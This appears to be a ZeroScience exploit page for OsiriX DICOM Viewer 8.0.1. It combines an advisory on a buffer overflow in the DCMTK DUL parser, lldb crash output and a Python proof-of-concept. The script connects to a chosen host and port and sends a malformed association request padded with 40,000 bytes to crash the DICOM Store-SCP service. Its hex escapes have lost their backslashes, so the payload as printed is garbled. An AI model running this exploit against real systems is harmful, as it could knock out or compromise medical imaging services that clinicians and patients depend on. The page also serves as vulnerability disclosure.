OsiriX DICOM Viewer 8.0.1 dulparse.cc Remote Memory Corruption
Posted on 30 November -0001
<HTML><HEAD><TITLE>OsiriX DICOM Viewer 8.0.1 (dulparse.cc) Remote Memory Corruption</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>#!/usr/bin/env python # -*- coding: utf8 -*- # # # OsiriX DICOM Viewer 8.0.1 (dulparse.cc) Remote Memory Corruption Vulnerability # # # Vendor: Pixmeo Sarl # Product web page: http://www.osirix-viewer.com # Affected version: OsiriX 8.0.1 # # Summary: With high performance and an intuitive interactive user interface, OsiriX MD is # the most widely used DICOM viewer in the world. It is the result of more than 10 years of # research and development in digital imaging. It fully supports the DICOM standard for an # easy integration in your workflow environment and an open platform for development of # processing tools. It offers advanced post-processing techniques in 2D and 3D, exclusive # innovative technique for 3D and 4D navigation and a complete integration with any PACS. # OsiriX MD supports 64-bit computing and multithreading for the best performances on the # most modern processors. OsiriX MD is certified for medical use, FDA cleared and CE II labeled. # # Summary2: OsiriX is an image processing application for Mac dedicated to DICOM images # (".dcm" / ".DCM" extension) produced by equipment (MRI, CT, PET, PET-CT, ...). # Osirix is complementary to existing viewers, in particular to nuclear medicine viewers. # # Desc: The vulnerability is caused due to the usage of vulnerable collection of libraries that # are part of DCMTK Toolkit, specifically the parser for the DICOM Upper Layer Protocol or DUL. # Stack/Heap Buffer overflow/underflow can be triggered when sending and processing wrong length # of ACSE data structure received over the network by the DICOM Store-SCP service. An attacker can # overflow the stack and the heap of the process when sending large array of bytes to the presentation # context item length segment of the DICOM standard, potentially resulting in remote code execution # and/or denial of service scenario. # # ------------------------------------------------------------------------------------- # # (lldb) # Process 65202 stopped # * thread #20: tid = 0x2c5fcc, 0x0000000108978441 OsiriX Lite`parseAssociate(unsigned char*, unsigned int, dul_associatepdu*) + 833, name = 'DICOM Store-SCP', stop reason = EXC_BAD_ACCESS (code=1, address=0x7fb5af00fda1) # frame #0: 0x0000000108978441 OsiriX Lite`parseAssociate(unsigned char*, unsigned int, dul_associatepdu*) + 833 # OsiriX Lite`parseAssociate: # -> 0x108978441 <+833>: movzbl (%r10), %eax # 0x108978445 <+837>: cmpl $0x40, %eax # 0x108978448 <+840>: movq -0x200(%rbp), %rcx # 0x10897844f <+847>: je 0x108978513 ; <+1043> # (lldb) bt # * thread #19: tid = 0x2f6189, 0x0000000102fe8441 OsiriX Lite`parseAssociate(unsigned char*, unsigned int, dul_associatepdu*) + 833, name = 'DICOM Store-SCP', stop reason = EXC_BAD_ACCESS (code=1, address=0x7fab8ac000a1) # * frame #0: 0x0000000102fe8441 OsiriX Lite`parseAssociate(unsigned char*, unsigned int, dul_associatepdu*) + 833 # frame #1: 0x0000000102fe4363 OsiriX Lite`AE_6_ExamineAssociateRequest(PRIVATE_NETWORKKEY**, PRIVATE_ASSOCIATIONKEY**, int, void*) + 339 # frame #2: 0x0000000102fe14ca OsiriX Lite`PRV_StateMachine(PRIVATE_NETWORKKEY**, PRIVATE_ASSOCIATIONKEY**, int, int, void*) + 314 # frame #3: 0x0000000102fdae9c OsiriX Lite`DUL_ReceiveAssociationRQ(void**, DUL_BLOCKOPTIONS, int, DUL_ASSOCIATESERVICEPARAMETERS*, void**, int) + 4348 # frame #4: 0x0000000102facf1e OsiriX Lite`ASC_receiveAssociation(T_ASC_Network*, T_ASC_Association**, long, void**, unsigned int*, bool, DUL_BLOCKOPTIONS, int) + 462 # frame #5: 0x0000000102c5f28f OsiriX Lite`DcmQueryRetrieveSCP::waitForAssociation(T_ASC_Network*) + 207 # frame #6: 0x0000000102c3f9c7 OsiriX Lite`-[DCMTKQueryRetrieveSCP run] + 4999 # frame #7: 0x0000000102987a37 OsiriX Lite`-[AppController startSTORESCP:] + 519 # frame #8: 0x00007fff975b030d Foundation`__NSThread__start__ + 1243 # frame #9: 0x00007fffab021aab libsystem_pthread.dylib`_pthread_body + 180 # frame #10: 0x00007fffab0219f7 libsystem_pthread.dylib`_pthread_start + 286 # frame #11: 0x00007fffab021221 libsystem_pthread.dylib`thread_start + 13 # (lldb) register read # General Purpose Registers: # rax = 0x0000000000000103 # rbx = 0x00000001044c18d8 OsiriX Lite`ECC_Normal # rcx = 0x00006100002e6200 # rdx = 0x000000000001ad41 # rdi = 0x00000001044c18d8 OsiriX Lite`ECC_Normal # rsi = 0x00006100002e6200 # rbp = 0x0000700005a4a670 # rsp = 0x0000700005a4a420 # r8 = 0x0000000000000103 # r9 = 0x00000000fb40cfc6 # r10 = 0x00007fab8ac000a1 # r11 = 0x0000000000000041 # r12 = 0x0000700005a4a6b8 # r13 = 0x00000001044c18f0 OsiriX Lite`EC_Normal # r14 = 0x00000001044c18d8 OsiriX Lite`ECC_Normal # r15 = 0x0000000000008014 # rip = 0x0000000102fe8441 OsiriX Lite`parseAssociate(unsigned char*, unsigned int, dul_associatepdu*) + 833 # rflags = 0x0000000000010286 # cs = 0x000000000000002b # fs = 0x0000000000000000 # gs = 0x0000000000000000 # # ------------------------------------------------------------------------------------- # # Tested on: OS X 10.12.2 (Sierra) # OS X 10.12.1 (Sierra) # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2016-5382 # Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5382.php # # https://tools.ietf.org/html/rfc3240 # https://github.com/commontk/DCMTK/commit/1b6bb76 # # 29.11.2016 # import sys, socket hello = ('x01x00x00x00x80x71x00x01x00x00x4fx52x54x48' 'x41x4ex43x20x20x20x20x20x20x20x20x20x4ax4f' 'x58x59x50x4fx58x59x21x00x00x00x00x00x00x00' 'x00x00x00x00x00x00x00x00x00x00x00x00x00x00' 'x00x00x00x00x00x00x00x00x00x00x00x00x00x00' 'x00x00x00x00x10x00x00x15x31x2ex32x2ex38x34' 'x30x2ex31x30x30x30x38x2ex33x2ex31x2ex31x2e' 'x31x20x00x80x00') bye = ('x50x00x00x0cx51x00x00x04x00x00x07xde' 'x52x00x00x00') buffer = 'x41x42x43x44' * 10000 if len(sys.argv) < 3: print ' Usage: ' +sys.argv[0]+ ' <target> <port>' print 'Example: ' +sys.argv[0]+ ' 172.19.0.214 11112 ' sys.exit(0) host = sys.argv[1] port = int(sys.argv[2]) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect((host, port)) s.settimeout(251) s.send(hello+buffer+bye) s.close </BODY></HTML>